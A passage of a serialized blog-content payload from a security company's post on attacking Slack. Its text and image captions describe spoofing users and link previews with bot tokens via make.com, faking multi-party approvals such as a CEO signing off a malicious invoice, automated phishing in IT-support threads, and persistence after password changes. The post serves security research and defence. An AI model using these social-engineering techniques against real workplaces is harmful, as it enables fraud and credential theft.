",{"data":277226,"content":277230,"nodeType":312},{"target":277227},{"sys":277228},{"id":277229,"type":317,"linkType":318},"6BuFqoDtaUGpz48ANXRDJu",[],{"data":277232,"content":277233,"nodeType":178},{},[277234],{"data":277235,"marks":277236,"value":277237,"nodeType":173},{},[],"Here’s a quick video demonstrating this combination of user spoofing, link preview spoofing and a shadow workflow in action:",{"data":277239,"content":277243,"nodeType":312},{"target":277240},{"sys":277241},{"id":277242,"type":317,"linkType":318},"2PYOjiz7DIRKqdYuushsqB",[],{"data":277245,"content":277246,"nodeType":178},{},[277247],{"data":277248,"marks":277249,"value":277250,"nodeType":173},{},[],"To summarize, heres a diagram to show how this all fits together:",{"data":277252,"content":277256,"nodeType":312},{"target":277253},{"sys":277254},{"id":277255,"type":317,"linkType":318},"6BsctEd635MRwcuzpOhx1V",[],{"data":277258,"content":277259,"nodeType":235},{},[277260],{"data":277261,"marks":277262,"value":277263,"nodeType":173},{},[],"Multi-party spoofing",{"data":277265,"content":277266,"nodeType":178},{},[277267],{"data":277268,"marks":277269,"value":277270,"nodeType":173},{},[],"Another great possibility provided from using Slack apps and bot tokens for spoofing is the ability to spoof inline with existing communications as multiple parties. Ordinarily, if a Slack user kept changing their name, handle and photo for spoofing internally, Slack would change all existing messages to the latest profile data every time. That makes it hard to spoof multiple identities in short time windows and so an attacker could only really spoof one person at a time. However, with Slack apps you can inject messages as different people at different points of a conversation using bot tokens.",{"data":277272,"content":277273,"nodeType":178},{},[277274],{"data":277275,"marks":277276,"value":277277,"nodeType":173},{},[],"Consider the following example, where I’m using my own internal account to message the CFO about paying a malicious invoice that I have hypothetically raised. Perhaps they then indicate approval is needed from another party, in this case the CEO. Similarly, this might be a common process for access requests requiring manager approval and many other business processes. ",{"data":277279,"content":277280,"nodeType":178},{},[277281],{"data":277282,"marks":277283,"value":277284,"nodeType":173},{},[],"In this case, I’m able to quickly spoof a message as another user to act as the approval in a manner that is pretty sneaky. The only giveaway at first glance is the “APP” tag after the spoofed message.",{"data":277286,"content":277290,"nodeType":312},{"target":277287},{"sys":277288},{"id":277289,"type":317,"linkType":318},"0Qrre7ZeVsFu1usSSyNS8",[],{"data":277292,"content":277293,"nodeType":178},{},[277294],{"data":277295,"marks":277296,"value":277297,"nodeType":173},{},[],"This is just one example but the ability to spoof multiple identities simultaneously from just one compromised account on what is usually seen as a trusted internal communications system really opens up a ton of possibilities for social engineering attacks focused on lateral movement. ",{"data":277299,"content":277302,"nodeType":312},{"target":277300},{"sys":277301},{"id":209109,"type":317,"linkType":318},[],{"data":277304,"content":277305,"nodeType":169},{},[277306],{"data":277307,"marks":277308,"value":15539,"nodeType":173},{},[],{"data":277310,"content":277311,"nodeType":178},{},[277312],{"data":277313,"marks":277314,"value":277315,"nodeType":173},{},[],"After two whole posts on attacking Slack, covering both external attacks during the initial access phase and internal attacks in the persistence and lateral movement phases, we’ve covered a serious amount of ground! ",{"data":277317,"content":277318,"nodeType":178},{},[277319],{"data":277320,"marks":277321,"value":277322,"nodeType":173},{},[],"It’s worth taking a step back and considering the key impact points:",{"data":277324,"content":277325,"nodeType":250},{},[277326,277335,277344,277353,277362,277395],{"data":277327,"content":277328,"nodeType":254},{},[277329],{"data":277330,"content":277331,"nodeType":178},{},[277332],{"data":277333,"marks":277334,"value":275369,"nodeType":173},{},[],{"data":277336,"content":277337,"nodeType":254},{},[277338],{"data":277339,"content":277340,"nodeType":178},{},[277341],{"data":277342,"marks":277343,"value":265112,"nodeType":173},{},[],{"data":277345,"content":277346,"nodeType":254},{},[277347],{"data":277348,"content":277349,"nodeType":178},{},[277350],{"data":277351,"marks":277352,"value":265122,"nodeType":173},{},[],{"data":277354,"content":277355,"nodeType":254},{},[277356],{"data":277357,"content":277358,"nodeType":178},{},[277359],{"data":277360,"marks":277361,"value":275397,"nodeType":173},{},[],{"data":277363,"content":277364,"nodeType":254},{},[277365,277372],{"data":277366,"content":277367,"nodeType":178},{},[277368],{"data":277369,"marks":277370,"value":277371,"nodeType":173},{},[],"Slack apps, and especially bot tokens, can be used for very effective persistence techniques. Some examples:",{"data":277373,"content":277374,"nodeType":250},{},[277375,277385],{"data":277376,"content":277377,"nodeType":254},{},[277378],{"data":277379,"content":277380,"nodeType":178},{},[277381],{"data":277382,"marks":277383,"value":277384,"nodeType":173},{},[],"It’s possible to read all messages even after a compromised user changes their password",{"data":277386,"content":277387,"nodeType":254},{},[277388],{"data":277389,"content":277390,"nodeType":178},{},[277391],{"data":277392,"marks":277393,"value":277394,"nodeType":173},{},[],"It’s possible to send (and spoof) messages even if the compromised user account is deleted (e.g. a disgruntled employee who is fired)",{"data":277396,"content":277397,"nodeType":254},{},[277398,277405],{"data":277399,"content":277400,"nodeType":178},{},[277401],{"data":277402,"marks":277403,"value":277404,"nodeType":173},{},[],"Slack apps and shadow workflows can be used to conduct some fairly advanced social engineering attacks once an attack has a foothold on a Slack tenant. Some examples:",{"data":277406,"content":277407,"nodeType":250},{},[277408,277418],{"data":277409,"content":277410,"nodeType":254},{},[277411],{"data":277412,"content":277413,"nodeType":178},{},[277414],{"data":277415,"marks":277416,"value":277417,"nodeType":173},{},[],"Automatically phishing employees in response to common IT support questions",{"data":277419,"content":277420,"nodeType":254},{},[277421],{"data":277422,"content":277423,"nodeType":178},{},[277424],{"data":277425,"marks":277426,"value":277427,"nodeType":173},{},[],"Multi-party spoofing for advanced social engineering",{"data":277429,"content":277430,"nodeType":169},{},[277431],{"data":277432,"marks":277433,"value":40632,"nodeType":173},{},[],{"data":277435,"content":277436,"nodeType":178},{},[277437],{"data":277438,"marks":277439,"value":265145,"nodeType":173},{},[],{"data":277441,"content":277442,"nodeType":178},{},[277443],{"data":277444,"marks":277445,"value":277446,"nodeType":173},{},[],"This also means organizations reliant on traditional email security gateways and email-based phishing training are likely to see the effectiveness of these controls decrease if attacks shift to the IM apps. ",{"data":277448,"content":277449,"nodeType":178},{},[277450],{"data":277451,"marks":277452,"value":277453,"nodeType":173},{},[],"In this article, we highlighted a number of spoofing, phishing and persistence techniques that can be employed by an attacker with a foothold that has compromised an internal account on a Slack tenant in order to persist their access and perform lateral movement. In the previous article, we covered spoofing and phishing techniques that could be used by external attackers in the initial access phase to get that first foothold in the first place.",{"data":277455,"content":277456,"nodeType":178},{},[277457],{"data":277458,"marks":277459,"value":275429,"nodeType":173},{},[],{"entries":277461},{"inline":277462,"hyperlink":277463,"block":277472},[],[277464,277466,277470],{"sys":277465,"__typename":1528,"title":252410,"slug":252411},{"id":236132},{"sys":277467,"__typename":1528,"title":277468,"slug":277469},{"id":276988},"Maintaining persistent access in a SaaS-first world","maintaining-persistent-access-in-a-saas-first-world",{"sys":277471,"__typename":1528,"title":268752,"slug":268754},{"id":267879},[277473,277475,277482,277489,277496,277503,277510,277517,277525,277532,277540,277547,277552,277558,277566],{"sys":277474,"__typename":15269,"type":112637,"ctaText":192192,"buttonLabel":192193,"buttonColour":15273,"buttonUrl":118},{"id":169040},{"sys":277476,"__typename":5345,"title":277477,"caption":277478,"layoutMode":118,"file":277479},{"id":277044},"Slack phishing 2: new make.com scenario","Creating a new scenario in make.com and picking a Slack module",{"url":277480,"width":277481,"height":260431},"https://images.ctfassets.net/y1cdw1ablpvd/1uJzr0ucaJ8MLDNMahXMB1/0283901315071d91b82b99219f63636e/image2.png",730,{"sys":277483,"__typename":5345,"title":277484,"caption":277485,"layoutMode":118,"file":277486},{"id":277071},"Slack phishing 2: picking bot connection","Picking a Slack bot connection when making the Slack integration",{"url":277487,"width":173217,"height":277488},"https://images.ctfassets.net/y1cdw1ablpvd/6WqmwIk8FjPXOyxbxED5Qi/e87f8525c1de1f7c34d2a6c15114e80d/image3.png",335,{"sys":277490,"__typename":5345,"title":277491,"caption":277492,"layoutMode":118,"file":277493},{"id":277077},"Slack phishing 2: OAuth2 permission","Accepting the OAuth2 permissions request for the app. Make.com still uses an app called “Integromat”, a legacy name for the company",{"url":277494,"width":277495,"height":265221},"https://images.ctfassets.net/y1cdw1ablpvd/5HVlkZQTmdiPDqv7jJehmn/fb6ebc3d0fe078a7f15a86539559a4e7/image12.png",669,{"sys":277497,"__typename":5345,"title":277498,"caption":277499,"layoutMode":118,"file":277500},{"id":277110},"Slack phishing 2: make.com module","Setting the module to send a message to a public slack channel as the bot account",{"url":277501,"width":195164,"height":277502},"https://images.ctfassets.net/y1cdw1ablpvd/2RbQjzfLYcwWQx69z8itqT/45f8a0019ec4ba3bbebf8075611c9a0a/image7.png",644,{"sys":277504,"__typename":5345,"title":277505,"caption":277506,"layoutMode":118,"file":277507},{"id":277116},"Slack phishing 2: make.com bot","Configuring the bot to use a different name and photo in order to spoof the user",{"url":277508,"width":173217,"height":277509},"https://images.ctfassets.net/y1cdw1ablpvd/1XZquRG7yPnJUkbOUqaUQp/13047e61614ab9f66ee7aba89ad0ab1b/image6.png",368,{"sys":277511,"__typename":5345,"title":277512,"caption":277513,"layoutMode":118,"file":277514},{"id":277122},"Slack phishing 2: phishing message","The phishing message sent once the scenario is run, which is almost identical in appearance to what we saw previously except for “APP” after the name",{"url":277515,"width":277516,"height":23894},"https://images.ctfassets.net/y1cdw1ablpvd/5D2bon4DWhciGqyrjW1cfF/9b3aa5dbab536a60e1fdd4eeffa16038/image5.png",1060,{"sys":277518,"__typename":5345,"title":277519,"caption":277520,"layoutMode":118,"file":277521},{"id":277150},"Slack phishing 2: spoof message","Sending a spoofed message without the use of a bot token allows someone to click on the user and see the original email address",{"url":277522,"width":277523,"height":277524},"https://images.ctfassets.net/y1cdw1ablpvd/JA1ilU37q6o9dd66fPo0N/656f1e35cdbf044d5d244c703735fdac/image8.png",389,664,{"sys":277526,"__typename":5345,"title":277527,"caption":277528,"layoutMode":118,"file":277529},{"id":277156},"Slack phishing 2: spoof message with bot token","Sending a spoofed message using a bot token from make.com takes the user to the Integromat app if they click on the user, so they can’t easily see who was responsible",{"url":277530,"width":277531,"height":53620},"https://images.ctfassets.net/y1cdw1ablpvd/1WLBeP00qfcJA57SU50jhO/a925300ed74c4160df3d2c8333b9601b/image10.png",1250,{"sys":277533,"__typename":5345,"title":277534,"caption":277535,"layoutMode":118,"file":277536},{"id":277197},"Slack phishing 2: monitor for keywords","Creating a scenario to monitor public channel messages for certain keywords in order to reply with phishing messages",{"url":277537,"width":277538,"height":277539},"https://images.ctfassets.net/y1cdw1ablpvd/1vnotvKHH2WlPkaAdgnBfd/a2b62d3b74ba4dcce0ac358a53a1d563/image11.png",1260,909,{"sys":277541,"__typename":5345,"title":277542,"caption":277543,"layoutMode":118,"file":277544},{"id":277229},"Slack phishing 2: make.com response","Our make.com scenario automatically responding in a thread with a targeted phishing link from a spoofed bot user, using a spoofed link preview",{"url":277545,"width":5358,"height":277546},"https://images.ctfassets.net/y1cdw1ablpvd/4djCgzAgzmqZ6o0efkEAaW/40b304ed2373d6fec9e54a16a1ca5bad/image4.png",771,{"sys":277548,"__typename":5345,"title":277549,"caption":118,"layoutMode":118,"file":277550},{"id":277242},"Slack IT bot phishing automation demo",{"url":277551,"width":121106,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/2DAJiJLPZ48TRTl9HVfgP4/7e1383ae8f46ae4122c75dd30c6dce6b/slack-it-bot-phishing-auotmation-demo-trimmed.webp",{"sys":277553,"__typename":5345,"title":277554,"caption":277555,"layoutMode":118,"file":277556},{"id":277255},"Slack phishing 2: technical diagram","Diagram showing the connections between the attacker, compromised Slack account and make.com",{"url":277557,"width":5358,"height":23887},"https://images.ctfassets.net/y1cdw1ablpvd/3y1xzUl7WslwtWeK7xaUMU/0162c7c512d7e054f06b73b2ff22726e/image1.png",{"sys":277559,"__typename":5345,"title":277560,"caption":277561,"layoutMode":118,"file":277562},{"id":277289},"Slack phishing 2: multi-party spoofing","Multi-party spoofing of messages for advanced social engineering internally on Slack",{"url":277563,"width":277564,"height":277565},"https://images.ctfassets.net/y1cdw1ablpvd/6RSsQoqyciS8xxEmqNAZgf/ab12b5c1777fbc574c079ca9d7ea3532/image9.png",538,214,{"sys":277567,"__typename":15269,"type":117876,"ctaText":265256,"buttonLabel":265257,"buttonColour":152046,"buttonUrl":118},{"id":209109},"content:blog:phishing-slack-persistence.json","blog/phishing-slack-persistence.json","blog/phishing-slack-persistence",{"_path":277572,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":277573,"ogImage":118,"summary":277575,"title":252410,"subtitle":118,"metaTitle":264498,"synopsis":275460,"hashTags":118,"publishedDate":274725,"slug":252411,"tagsCollection":277586,"relatedBlogPostsCollection":277592,"authorsCollection":279518,"content":279522,"_id":280293,"_type":5439,"_source":5440,"_file":280294,"_stem":280295,"_extension":5439},"/blog/slack-phishing-for-initial-access",{"id":236132,"publishedAt":277574},"2024-03-21T08:57:37.984Z",{"json":277576},{"data":277577,"content":277578,"nodeType":165},{},[277579],{"data":277580,"content":277581,"nodeType":178},{},[277582],{"data":277583,"marks":277584,"value":277585,"nodeType":173},{},[],"Our latest post in the SaaS attacks matrix series is focused on external phishing via Slack. Unlike email, IM apps and the messages within them are typically more trusted by employees, making social engineering via Slack a juicy target.",{"items":277587},[277588,277590],{"sys":277589,"name":505},{"id":504},{"sys":277591,"name":26137},{"id":26136},{"items":277593},[277594,278341,279112],{"__typename":1528,"sys":277595,"content":277596,"title":265179,"synopsis":274724,"hashTags":118,"publishedDate":274725,"slug":265180,"tagsCollection":278331,"authorsCollection":278337},{"id":264515},{"json":277597},{"data":277598,"content":277599,"nodeType":165},{},[277600,277616,277634,277640,277719,277725,277745,277751,277757,277763,277769,277799,277805,277841,277847,277852,277858,277876,277882,277888,277904,277922,277940,277946,277952,277958,277963,277969,277975,277981,277986,277991,278009,278015,278020,278025,278030,278036,278049,278054,278059,278065,278071,278077,278083,278089,278094,278100,278117,278122,278128,278133,278139,278144,278150,278156,278162,278168,278173,278179,278184,278190,278196,278202,278301,278307,278313,278319,278325],{"data":277601,"content":277602,"nodeType":178},{},[277603,277606,277613],{"data":277604,"marks":277605,"value":276662,"nodeType":173},{},[],{"data":277607,"content":277608,"nodeType":186},{"uri":88239},[277609],{"data":277610,"marks":277611,"value":88742,"nodeType":173},{},[277612],{"type":194},{"data":277614,"marks":277615,"value":276673,"nodeType":173},{},[],{"data":277617,"content":277618,"nodeType":178},{},[277619,277622,277631],{"data":277620,"marks":277621,"value":5039,"nodeType":173},{},[],{"data":277623,"content":277626,"nodeType":1698},{"target":277624},{"sys":277625},{"id":236132,"type":317,"linkType":318},[277627],{"data":277628,"marks":277629,"value":276689,"nodeType":173},{},[277630],{"type":194},{"data":277632,"marks":277633,"value":276693,"nodeType":173},{},[],{"data":277635,"content":277636,"nodeType":178},{},[277637],{"data":277638,"marks":277639,"value":276700,"nodeType":173},{},[],{"data":277641,"content":277642,"nodeType":250},{},[277643,277662,277681,277700],{"data":277644,"content":277645,"nodeType":254},{},[277646],{"data":277647,"content":277648,"nodeType":178},{},[277649,277652,277659],{"data":277650,"marks":277651,"value":37,"nodeType":173},{},[],{"data":277653,"content":277654,"nodeType":186},{"uri":197770},[277655],{"data":277656,"marks":277657,"value":264557,"nodeType":173},{},[277658],{"type":194},{"data":277660,"marks":277661,"value":37,"nodeType":173},{},[],{"data":277663,"content":277664,"nodeType":254},{},[277665],{"data":277666,"content":277667,"nodeType":178},{},[277668,277671,277678],{"data":277669,"marks":277670,"value":37,"nodeType":173},{},[],{"data":277672,"content":277673,"nodeType":186},{"uri":208435},[277674],{"data":277675,"marks":277676,"value":264576,"nodeType":173},{},[277677],{"type":194},{"data":277679,"marks":277680,"value":37,"nodeType":173},{},[],{"data":277682,"content":277683,"nodeType":254},{},[277684],{"data":277685,"content":277686,"nodeType":178},{},[277687,277690,277697],{"data":277688,"marks":277689,"value":37,"nodeType":173},{},[],{"data":277691,"content":277692,"nodeType":186},{"uri":276753},[277693],{"data":277694,"marks":277695,"value":276759,"nodeType":173},{},[277696],{"type":194},{"data":277698,"marks":277699,"value":37,"nodeType":173},{},[],{"data":277701,"content":277702,"nodeType":254},{},[277703],{"data":277704,"content":277705,"nodeType":178},{},[277706,277709,277716],{"data":277707,"marks":277708,"value":37,"nodeType":173},{},[],{"data":277710,"content":277711,"nodeType":186},{"uri":144083},[277712],{"data":277713,"marks":277714,"value":230156,"nodeType":173},{},[277715],{"type":194},{"data":277717,"marks":277718,"value":37,"nodeType":173},{},[],{"data":277720,"content":277721,"nodeType":169},{},[277722],{"data":277723,"marks":277724,"value":264586,"nodeType":173},{},[],{"data":277726,"content":277727,"nodeType":178},{},[277728,277732,277741],{"data":277729,"marks":277730,"value":276795,"nodeType":173},{},[277731],{"type":1646},{"data":277733,"content":277736,"nodeType":1698},{"target":277734},{"sys":277735},{"id":236132,"type":317,"linkType":318},[277737],{"data":277738,"marks":277739,"value":276689,"nodeType":173},{},[277740],{"type":1646},{"data":277742,"marks":277743,"value":276809,"nodeType":173},{},[277744],{"type":1646},{"data":277746,"content":277747,"nodeType":178},{},[277748],{"data":277749,"marks":277750,"value":264601,"nodeType":173},{},[],{"data":277752,"content":277753,"nodeType":178},{},[277754],{"data":277755,"marks":277756,"value":264608,"nodeType":173},{},[],{"data":277758,"content":277759,"nodeType":178},{},[277760],{"data":277761,"marks":277762,"value":264615,"nodeType":173},{},[],{"data":277764,"content":277765,"nodeType":178},{},[277766],{"data":277767,"marks":277768,"value":264622,"nodeType":173},{},[],{"data":277770,"content":277771,"nodeType":250},{},[277772,277781,277790],{"data":277773,"content":277774,"nodeType":254},{},[277775],{"data":277776,"content":277777,"nodeType":178},{},[277778],{"data":277779,"marks":277780,"value":264635,"nodeType":173},{},[],{"data":277782,"content":277783,"nodeType":254},{},[277784],{"data":277785,"content":277786,"nodeType":178},{},[277787],{"data":277788,"marks":277789,"value":264645,"nodeType":173},{},[],{"data":277791,"content":277792,"nodeType":254},{},[277793],{"data":277794,"content":277795,"nodeType":178},{},[277796],{"data":277797,"marks":277798,"value":264655,"nodeType":173},{},[],{"data":277800,"content":277801,"nodeType":178},{},[277802],{"data":277803,"marks":277804,"value":264662,"nodeType":173},{},[],{"data":277806,"content":277807,"nodeType":178},{},[277808,277811,277818,277821,277828,277831,277838],{"data":277809,"marks":277810,"value":264669,"nodeType":173},{},[],{"data":277812,"content":277813,"nodeType":186},{"uri":264672},[277814],{"data":277815,"marks":277816,"value":264678,"nodeType":173},{},[277817],{"type":194},{"data":277819,"marks":277820,"value":264682,"nodeType":173},{},[],{"data":277822,"content":277823,"nodeType":186},{"uri":264685},[277824],{"data":277825,"marks":277826,"value":264691,"nodeType":173},{},[277827],{"type":194},{"data":277829,"marks":277830,"value":264695,"nodeType":173},{},[],{"data":277832,"content":277833,"nodeType":186},{"uri":264698},[277834],{"data":277835,"marks":277836,"value":264704,"nodeType":173},{},[277837],{"type":194},{"data":277839,"marks":277840,"value":1477,"nodeType":173},{},[],{"data":277842,"content":277843,"nodeType":178},{},[277844],{"data":277845,"marks":277846,"value":274952,"nodeType":173},{},[],{"data":277848,"content":277851,"nodeType":312},{"target":277849},{"sys":277850},{"id":169040,"type":317,"linkType":318},[],{"data":277853,"content":277854,"nodeType":169},{},[277855],{"data":277856,"marks":277857,"value":276923,"nodeType":173},{},[],{"data":277859,"content":277860,"nodeType":178},{},[277861,277864,277873],{"data":277862,"marks":277863,"value":273719,"nodeType":173},{},[],{"data":277865,"content":277868,"nodeType":1698},{"target":277866},{"sys":277867},{"id":236132,"type":317,"linkType":318},[277869],{"data":277870,"marks":277871,"value":276689,"nodeType":173},{},[277872],{"type":194},{"data":277874,"marks":277875,"value":276942,"nodeType":173},{},[],{"data":277877,"content":277878,"nodeType":178},{},[277879],{"data":277880,"marks":277881,"value":276949,"nodeType":173},{},[],{"data":277883,"content":277884,"nodeType":178},{},[277885],{"data":277886,"marks":277887,"value":276956,"nodeType":173},{},[],{"data":277889,"content":277890,"nodeType":178},{},[277891,277894,277901],{"data":277892,"marks":277893,"value":276963,"nodeType":173},{},[],{"data":277895,"content":277896,"nodeType":186},{"uri":276966},[277897],{"data":277898,"marks":277899,"value":276972,"nodeType":173},{},[277900],{"type":194},{"data":277902,"marks":277903,"value":276976,"nodeType":173},{},[],{"data":277905,"content":277906,"nodeType":178},{},[277907,277910,277919],{"data":277908,"marks":277909,"value":276983,"nodeType":173},{},[],{"data":277911,"content":277914,"nodeType":1698},{"target":277912},{"sys":277913},{"id":276988,"type":317,"linkType":318},[277915],{"data":277916,"marks":277917,"value":276994,"nodeType":173},{},[277918],{"type":194},{"data":277920,"marks":277921,"value":276998,"nodeType":173},{},[],{"data":277923,"content":277924,"nodeType":178},{},[277925,277928,277937],{"data":277926,"marks":277927,"value":277005,"nodeType":173},{},[],{"data":277929,"content":277932,"nodeType":1698},{"target":277930},{"sys":277931},{"id":267879,"type":317,"linkType":318},[277933],{"data":277934,"marks":277935,"value":144086,"nodeType":173},{},[277936],{"type":194},{"data":277938,"marks":277939,"value":277018,"nodeType":173},{},[],{"data":277941,"content":277942,"nodeType":235},{},[277943],{"data":277944,"marks":277945,"value":277025,"nodeType":173},{},[],{"data":277947,"content":277948,"nodeType":178},{},[277949],{"data":277950,"marks":277951,"value":277032,"nodeType":173},{},[],{"data":277953,"content":277954,"nodeType":178},{},[277955],{"data":277956,"marks":277957,"value":277039,"nodeType":173},{},[],{"data":277959,"content":277962,"nodeType":312},{"target":277960},{"sys":277961},{"id":277044,"type":317,"linkType":318},[],{"data":277964,"content":277965,"nodeType":178},{},[277966],{"data":277967,"marks":277968,"value":277052,"nodeType":173},{},[],{"data":277970,"content":277971,"nodeType":178},{},[277972],{"data":277973,"marks":277974,"value":277059,"nodeType":173},{},[],{"data":277976,"content":277977,"nodeType":178},{},[277978],{"data":277979,"marks":277980,"value":277066,"nodeType":173},{},[],{"data":277982,"content":277985,"nodeType":312},{"target":277983},{"sys":277984},{"id":277071,"type":317,"linkType":318},[],{"data":277987,"content":277990,"nodeType":312},{"target":277988},{"sys":277989},{"id":277077,"type":317,"linkType":318},[],{"data":277992,"content":277993,"nodeType":178},{},[277994,277997,278006],{"data":277995,"marks":277996,"value":277085,"nodeType":173},{},[],{"data":277998,"content":278001,"nodeType":1698},{"target":277999},{"sys":278000},{"id":236132,"type":317,"linkType":318},[278002],{"data":278003,"marks":278004,"value":276689,"nodeType":173},{},[278005],{"type":194},{"data":278007,"marks":278008,"value":277098,"nodeType":173},{},[],{"data":278010,"content":278011,"nodeType":178},{},[278012],{"data":278013,"marks":278014,"value":277105,"nodeType":173},{},[],{"data":278016,"content":278019,"nodeType":312},{"target":278017},{"sys":278018},{"id":277110,"type":317,"linkType":318},[],{"data":278021,"content":278024,"nodeType":312},{"target":278022},{"sys":278023},{"id":277116,"type":317,"linkType":318},[],{"data":278026,"content":278029,"nodeType":312},{"target":278027},{"sys":278028},{"id":277122,"type":317,"linkType":318},[],{"data":278031,"content":278032,"nodeType":178},{},[278033],{"data":278034,"marks":278035,"value":277130,"nodeType":173},{},[],{"data":278037,"content":278038,"nodeType":178},{},[278039,278042,278046],{"data":278040,"marks":278041,"value":277137,"nodeType":173},{},[],{"data":278043,"marks":278044,"value":277142,"nodeType":173},{},[278045],{"type":1646},{"data":278047,"marks":278048,"value":39946,"nodeType":173},{},[],{"data":278050,"content":278053,"nodeType":312},{"target":278051},{"sys":278052},{"id":277150,"type":317,"linkType":318},[],{"data":278055,"content":278058,"nodeType":312},{"target":278056},{"sys":278057},{"id":277156,"type":317,"linkType":318},[],{"data":278060,"content":278061,"nodeType":235},{},[278062],{"data":278063,"marks":278064,"value":277164,"nodeType":173},{},[],{"data":278066,"content":278067,"nodeType":178},{},[278068],{"data":278069,"marks":278070,"value":277171,"nodeType":173},{},[],{"data":278072,"content":278073,"nodeType":178},{},[278074],{"data":278075,"marks":278076,"value":277178,"nodeType":173},{},[],{"data":278078,"content":278079,"nodeType":178},{},[278080],{"data":278081,"marks":278082,"value":277185,"nodeType":173},{},[],{"data":278084,"content":278085,"nodeType":178},{},[278086],{"data":278087,"marks":278088,"value":277192,"nodeType":173},{},[],{"data":278090,"content":278093,"nodeType":312},{"target":278091},{"sys":278092},{"id":277197,"type":317,"linkType":318},[],{"data":278095,"content":278096,"nodeType":178},{},[278097],{"data":278098,"marks":278099,"value":277205,"nodeType":173},{},[],{"data":278101,"content":278102,"nodeType":178},{},[278103,278106,278114],{"data":278104,"marks":278105,"value":277212,"nodeType":173},{},[],{"data":278107,"content":278110,"nodeType":1698},{"target":278108},{"sys":278109},{"id":236132,"type":317,"linkType":318},[278111],{"data":278112,"marks":278113,"value":276689,"nodeType":173},{},[],{"data":278115,"marks":278116,"value":277224,"nodeType":173},{},[],{"data":278118,"content":278121,"nodeType":312},{"target":278119},{"sys":278120},{"id":277229,"type":317,"linkType":318},[],{"data":278123,"content":278124,"nodeType":178},{},[278125],{"data":278126,"marks":278127,"value":277237,"nodeType":173},{},[],{"data":278129,"content":278132,"nodeType":312},{"target":278130},{"sys":278131},{"id":277242,"type":317,"linkType":318},[],{"data":278134,"content":278135,"nodeType":178},{},[278136],{"data":278137,"marks":278138,"value":277250,"nodeType":173},{},[],{"data":278140,"content":278143,"nodeType":312},{"target":278141},{"sys":278142},{"id":277255,"type":317,"linkType":318},[],{"data":278145,"content":278146,"nodeType":235},{},[278147],{"data":278148,"marks":278149,"value":277263,"nodeType":173},{},[],{"data":278151,"content":278152,"nodeType":178},{},[278153],{"data":278154,"marks":278155,"value":277270,"nodeType":173},{},[],{"data":278157,"content":278158,"nodeType":178},{},[278159],{"data":278160,"marks":278161,"value":277277,"nodeType":173},{},[],{"data":278163,"content":278164,"nodeType":178},{},[278165],{"data":278166,"marks":278167,"value":277284,"nodeType":173},{},[],{"data":278169,"content":278172,"nodeType":312},{"target":278170},{"sys":278171},{"id":277289,"type":317,"linkType":318},[],{"data":278174,"content":278175,"nodeType":178},{},[278176],{"data":278177,"marks":278178,"value":277297,"nodeType":173},{},[],{"data":278180,"content":278183,"nodeType":312},{"target":278181},{"sys":278182},{"id":209109,"type":317,"linkType":318},[],{"data":278185,"content":278186,"nodeType":169},{},[278187],{"data":278188,"marks":278189,"value":15539,"nodeType":173},{},[],{"data":278191,"content":278192,"nodeType":178},{},[278193],{"data":278194,"marks":278195,"value":277315,"nodeType":173},{},[],{"data":278197,"content":278198,"nodeType":178},{},[278199],{"data":278200,"marks":278201,"value":277322,"nodeType":173},{},[],{"data":278203,"content":278204,"nodeType":250},{},[278205,278214,278223,278232,278241,278271],{"data":278206,"content":278207,"nodeType":254},{},[278208],{"data":278209,"content":278210,"nodeType":178},{},[278211],{"data":278212,"marks":278213,"value":275369,"nodeType":173},{},[],{"data":278215,"content":278216,"nodeType":254},{},[278217],{"data":278218,"content":278219,"nodeType":178},{},[278220],{"data":278221,"marks":278222,"value":265112,"nodeType":173},{},[],{"data":278224,"content":278225,"nodeType":254},{},[278226],{"data":278227,"content":278228,"nodeType":178},{},[278229],{"data":278230,"marks":278231,"value":265122,"nodeType":173},{},[],{"data":278233,"content":278234,"nodeType":254},{},[278235],{"data":278236,"content":278237,"nodeType":178},{},[278238],{"data":278239,"marks":278240,"value":275397,"nodeType":173},{},[],{"data":278242,"content":278243,"nodeType":254},{},[278244,278250],{"data":278245,"content":278246,"nodeType":178},{},[278247],{"data":278248,"marks":278249,"value":277371,"nodeType":173},{},[],{"data":278251,"content":278252,"nodeType":250},{},[278253,278262],{"data":278254,"content":278255,"nodeType":254},{},[278256],{"data":278257,"content":278258,"nodeType":178},{},[278259],{"data":278260,"marks":278261,"value":277384,"nodeType":173},{},[],{"data":278263,"content":278264,"nodeType":254},{},[278265],{"data":278266,"content":278267,"nodeType":178},{},[278268],{"data":278269,"marks":278270,"value":277394,"nodeType":173},{},[],{"data":278272,"content":278273,"nodeType":254},{},[278274,278280],{"data":278275,"content":278276,"nodeType":178},{},[278277],{"data":278278,"marks":278279,"value":277404,"nodeType":173},{},[],{"data":278281,"content":278282,"nodeType":250},{},[278283,278292],{"data":278284,"content":278285,"nodeType":254},{},[278286],{"data":278287,"content":278288,"nodeType":178},{},[278289],{"data":278290,"marks":278291,"value":277417,"nodeType":173},{},[],{"data":278293,"content":278294,"nodeType":254},{},[278295],{"data":278296,"content":278297,"nodeType":178},{},[278298],{"data":278299,"marks":278300,"value":277427,"nodeType":173},{},[],{"data":278302,"content":278303,"nodeType":169},{},[278304],{"data":278305,"marks":278306,"value":40632,"nodeType":173},{},[],{"data":278308,"content":278309,"nodeType":178},{},[278310],{"data":278311,"marks":278312,"value":265145,"nodeType":173},{},[],{"data":278314,"content":278315,"nodeType":178},{},[278316],{"data":278317,"marks":278318,"value":277446,"nodeType":173},{},[],{"data":278320,"content":278321,"nodeType":178},{},[278322],{"data":278323,"marks":278324,"value":277453,"nodeType":173},{},[],{"data":278326,"content":278327,"nodeType":178},{},[278328],{"data":278329,"marks":278330,"value":275429,"nodeType":173},{},[],{"items":278332},[278333,278335],{"sys":278334,"name":505},{"id":504},{"sys":278336,"name":26137},{"id":26136},{"items":278338},[278339],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":278340},{"url":8615},{"__typename":1528,"sys":278342,"content":278343,"title":268752,"synopsis":267888,"hashTags":118,"publishedDate":268753,"slug":268754,"tagsCollection":279102,"authorsCollection":279108},{"id":267879},{"json":278344},{"nodeType":165,"data":278345,"content":278346},{},[278347,278353,278359,278387,278393,278399,278415,278421,278427,278433,278457,278463,278469,278482,278488,278494,278524,278530,278536,278542,278548,278554,278559,278565,278571,278577,278584,278590,278606,278612,278618,278624,278630,278636,278642,278648,278654,278660,278665,278671,278687,278693,278709,278714,278719,278724,278730,278736,278742,278747,278752,278758,278764,278770,278776,278782,278787,278803,278819,278825,278830,278835,278841,278847,278853,278859,278880,278885,278890,278896,278902,278908